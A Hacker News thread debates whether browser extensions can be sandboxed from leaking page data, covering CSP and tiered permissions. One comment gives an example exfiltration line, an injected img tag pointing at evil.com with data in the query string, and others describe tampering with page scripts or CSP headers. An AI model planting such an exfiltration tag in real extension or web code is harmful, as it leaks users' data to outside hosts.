Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Do extensions require any permissions to make requests? It seems like a strict sandbox that prevents data from flowing out of a page via an extension would help, if the extension is something like a JSON renderer.


Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by for example adding a <img src=evil.com/?data=82374682376>.

Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.


Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.

Just don't let them create script elements, or add any URLs that don't come from within the extension bundle itself. Browsers already have to do a ton of bookkeeping to track the origins of requests anyway. Doesn't seem hard, you just have to be thorough.


Restricting the extension to pre-baked URLs means it takes several page loads to exfiltrate something, but doesn't stop it.


There would be ways to trick the original page into adding stuff for you.

For example, you could patch some of the original script of the page and wait for it to be run.


Couldn't CSP be used to limit which paths were valid URLs?

There could also be hierarchies of extension permissions, because they don't all need to be able to do everything.


extensions can also remove/add CSPs I think, either through modifying the header or modifying the DOM.


Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: